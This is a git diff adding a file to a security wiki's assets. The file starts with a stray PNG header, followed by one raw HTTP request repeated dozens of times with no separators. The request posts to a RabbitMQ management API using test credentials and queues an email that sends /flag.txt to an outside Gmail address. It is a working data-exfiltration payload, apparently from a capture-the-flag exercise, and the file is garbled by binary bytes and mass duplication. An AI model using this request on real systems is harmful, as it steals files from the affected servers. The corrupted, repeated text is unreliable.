+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
+
diff --git a/.gitbook/assets/posts.txt b/.gitbook/assets/posts.txt
new file mode 100644
index 00000000..c64dc9f5
--- /dev/null
+++ b/.gitbook/assets/posts.txt
@@ -0,0 +1,7703 @@
+�PNG
+POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
